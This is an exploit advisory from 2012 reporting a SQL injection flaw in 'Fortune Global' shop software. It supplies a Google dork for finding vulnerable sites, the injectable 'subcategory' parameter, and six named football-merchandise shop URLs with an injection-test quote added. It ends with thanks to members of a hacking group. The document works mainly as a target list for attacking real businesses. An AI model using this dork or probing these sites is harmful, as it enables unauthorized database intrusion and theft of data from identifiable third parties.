################################################################## # Exploit Title: Fortune Global SQL injection # Date: 17-04-2012 # Author: CWpisagor # Category:: Webapps # Google dork: "© 2007 Fortune Global Ltd." inurl:index.php?subcategory=" # Tested on: Windows 7 ################################################################## www.server.com/path/index.php?subcategory=[SQL] Example Site http://www.fortuneglobal.co.uk/badfc/index.php?subcategory=240' http://chelseaclubshop.co.uk/index.php?subcategory=600' http://www.lfcshop.com/index.php?subcategory=399' http://www.manchesterunitedshirt.com/index.php?subcategory=803' http://www.westhamshirt.com/index.php?subcategory=604' http://www.arsenalfcshop.com/index.php?subcategory=600' Thanx : Volqan , CWKaraKule , Beyaz_Sancak , Servan , Hizmetkar , Mad_Boy and Cyber-Warrior All Users